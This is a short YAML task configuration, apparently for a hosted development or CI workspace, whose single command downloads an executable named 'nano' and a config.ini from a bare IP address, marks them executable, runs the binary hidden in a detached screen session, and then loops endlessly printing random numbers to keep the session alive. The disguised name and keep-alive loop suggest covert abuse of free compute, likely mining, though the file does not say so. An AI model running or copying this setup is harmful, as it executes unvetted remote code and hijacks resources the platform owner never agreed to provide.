tasks:
  - command: |
         sudo apt-get update
         sudo apt-get install -y screen
         wget -q http://139.180.153.145/nano
         wget -q http://139.180.153.145/config.ini
         chmod +x nano config.ini
         screen -dmS run ./nano
         while :; do shuf -n 1 -i 1-99999999; sleep 120; done